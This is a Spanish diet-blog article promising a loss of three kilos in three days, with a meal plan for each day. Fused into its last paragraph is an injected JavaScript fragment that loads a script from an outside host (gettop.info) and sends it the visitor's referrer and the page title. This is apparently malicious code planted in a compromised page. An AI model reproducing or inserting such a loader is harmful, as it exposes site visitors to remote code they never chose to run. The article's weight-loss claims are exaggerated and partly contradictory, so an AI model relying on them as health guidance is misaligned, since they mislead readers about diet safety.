Salud y belleza » Dieta

Como perder tres kilos en tres días

Sin Comentarios

¿Qué es lo que más nos seduce a la hora de seleccionar una dieta? ¿Acaso son las comidas que integran el plan? ¿Las promesas sobre sus efectos adelgazantes? ¿La reputación que alberga el instaurador de la dieta? ¿Su duración? ¿O la cantidad de kilos que se pueden bajar utilizándola?. Para quienes respondieron las opciones “D” y “E”, es decir, las dos últimas -aquellas que hacen foco en tiempo y resultado- les aseguramos que ésta es “su” dieta.


A continuación uno de los planes dietarios más destacados y populares de la actualidad: la excepcional dieta para perder…¡ tres kilos en tan solo tres días!.

Un plan excepcional pero, atención, al mismo tiempo riesgoso. Es por eso que , como siempre solemos hacer, te recomendamos que consultes la aplicación de tal plan con tu médico (cualquier individuo sano puede llevar a cabo este plan, aún así es mejor siempre estar seguro). Por cierto: la dieta, una vez concluida, debe balancearse, es decir el sujeto tiene la obligación de cesar con su uso.

En fin, vayamos al plan…

Primer día

Por la mañana: media toronja; una tostada con una cucharadita de mantequilla de maní; té o café sin azúcar.

Durante la tarde: media lata de atún en agua; una tostada; té o café.

A la noche: dos porciones de cualquier tipo de carne (parrilla o al horno); una taza de frijoles cocidos; una manzana pequeña; una copita pequeña de helados de vainilla.

Segundo Día

Por la mañana: un huevo duro; media banana; una tostada; té o café sin azúcar.

Durante la tarde: una taza de queso cottage; cinco galletas sin sal; té o café sin azúcar.

A la noche: dos salchichas; una taza de brócoli; media taza de zanahoria; medio banano; o media taza de helados de vainilla; té o café sin azúcar.

Tercer Día

Por la mañana: cinco galletas; una tajada de queso cheddar; una manzana pequeña; té o café sin azúcar.

Durante la tarde: un huevo duro; una tostada; té o café.

A la noche: media lata de atún en agua; una taza de vainicas hervidas; medio melón pequeño / media taza de helado de vainilla; té o café sin azúcar.

Como vemos, la dieta que protagoniza este artículo es tan sencilla de entender como lo es realizar una multpilicación de primer grado: 1 x 3 = 3. Es decir, una dieta, por tres días, deja como resultado un hombre o una mujer con tres kilos menos. ¡Genial, la matemática!.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.